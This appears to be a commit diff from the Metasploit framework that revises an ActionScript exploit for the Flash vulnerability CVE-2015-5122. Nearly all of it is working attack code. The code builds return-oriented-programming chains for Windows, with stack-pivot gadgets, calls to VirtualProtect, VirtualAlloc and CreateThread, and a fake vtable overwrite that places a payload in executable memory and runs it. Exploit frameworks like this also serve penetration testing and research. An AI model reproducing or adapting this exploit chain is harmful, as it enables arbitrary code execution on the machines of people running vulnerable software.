Put again old exploiter

Author: jvazquez-r7

data/exploits/CVE-2015-5122/msf.swf

@@ -164,113 +164,22 @@ package
             var memcpy:uint = pe.procedure("memcpy", ntdll)
             var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
             var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
-            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, flash)
-			
-			Logger.log("add esp c ret: " + addespcret.toString(16))
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
 
             // Continuation of execution
             eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
             eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
             eba.write(0, "\x89\x03", false) // mov [ebx], eax
-            //eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
-			
-			eba.write(0, "\x31\xC0", false) // xor eax, eax
-			eba.write(0, "\x87\xf4\xC2\x04\x00", false) // xchg esp, esi # ret 4
-			
-            // Put the payload (command) in memory
-            eba.write(payload_address + 8, payload, true); // payload
-
-            // Put the fake vtabe / stack on memory
-			//for (var i:uint = 0 ; i < 0x100; i = i + 4) {
-				//eba.write(stack_address + 0x18000 + i, 0x41410000 + i)
-			//}
-			
-            eba.write(stack_address + 0x18020, xchgeaxespret) // Initial gadget (stackpivot)
-			eba.write(stack_address + 0x18000, xchgeaxesiret) // save original esp in esi
-			
-			eba.write(0, addespcret)
-			eba.write(stack_address + 0x18014, addespcret)
-			eba.write(stack_address + 0x18024, virtualprotect)
-			//eba.write(0, virtualprotect)
-
-            // VirtualProtect
-            eba.write(0, virtualalloc)
-            eba.write(0, buffer + 0x10)
-            eba.write(0, 0x1000)
-            eba.write(0, 0x40)
-            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
-
-            // VirtualAlloc
-            eba.write(0, memcpy)
-            eba.write(0, 0x7f6e0000)
-            eba.write(0, 0x4000)
-            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
-            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
-
-            // memcpy
-            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
-            eba.write(0, 0x7f6e0000)
-            eba.write(0, payload_address + 8)
-            eba.write(0, payload.length) 
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
 
-            // CreateThread
-            eba.write(0, createthread)
-            eba.write(0, buffer + 0x10) // return to fix things
-            eba.write(0, 0)
-            eba.write(0, 0)
-            eba.write(0, 0x7f6e0000)
-            eba.write(0, 0)
-            eba.write(0, 0)
-            eba.write(0, 0)
-			
-            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
-			
-			Logger.alert("here we go " + main.toString(16) + " " + (stack_address + 0x18000).toString(16))
-			exploit.hasOwnProperty('msf')
-        }
-		
-		private function do_rop_windows8():void
-        {
-            Logger.log("[*] Exploiter - do_rop_windows()")
-            var pe:PE = new PE(eba)
-            var flash:uint = pe.base(vtable)
-            var winmm:uint = pe.module("winmm.dll", flash)
-            var kernel32:uint = pe.module("kernel32.dll", winmm)            
-            var ntdll:uint = pe.module("ntdll.dll", kernel32)
-            var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
-            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
-            var createthread:uint = pe.procedure("CreateThread", kernel32)
-            var memcpy:uint = pe.procedure("memcpy", ntdll)
-            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
-            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
-            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, flash)
-			
-			Logger.log("add esp c ret: " + addespcret.toString(16))
-            
-            // Continuation of execution
-            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
-            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
-            eba.write(0, "\x89\x03", false) // mov [ebx], eax
-            //eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
-			
-			eba.write(0, "\x31\xC0", false) // xor eax, eax
-			eba.write(0, "\x87\xf4\xC2\x04\x00", false) // xchg esp, esi # ret 4
-			
             // Put the payload (command) in memory
             eba.write(payload_address + 8, payload, true); // payload
 
             // Put the fake vtabe / stack on memory
-			//for (var i:uint = 0 ; i < 0x100; i = i + 4) {
-				//eba.write(stack_address + 0x18000 + i, 0x41410000 + i)
-			//}
-			
-            eba.write(stack_address + 0x18020, xchgeaxespret) // Initial gadget (stackpivot)
-			eba.write(stack_address + 0x18000, xchgeaxesiret) // save original esp in esi
-			
-			eba.write(0, addespcret)
-			eba.write(stack_address + 0x18014, addespcret)
-			eba.write(stack_address + 0x18024, virtualprotect)
-			//eba.write(0, virtualprotect)
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
 
             // VirtualProtect
             eba.write(0, virtualalloc)
@@ -301,14 +210,12 @@ package
             eba.write(0, 0)
             eba.write(0, 0)
             eba.write(0, 0)
-			
+           
             eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
-			
-			Logger.alert("here we go " + main.toString(16) + " " + (stack_address + 0x18000).toString(16))
-			exploit.hasOwnProperty('msf')
+            exploit.toString() // call method in the fake vtable
         }
 
-        /*private function do_rop_windows8():void
+        private function do_rop_windows8():void
         {
             Logger.log("[*] Exploiter - do_rop_windows8()")
             var pe:PE = new PE(eba)
@@ -372,9 +279,8 @@ package
             eba.write(0, 0)
 
             eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
-			Logger.alert("here we go " + main.toString(16) + " " + (stack_address + 0x18000).toString(16))
             exploit.toString() // call method in the fake vtable
-        }*/
+        }
 
         private function do_rop_linux():void
         {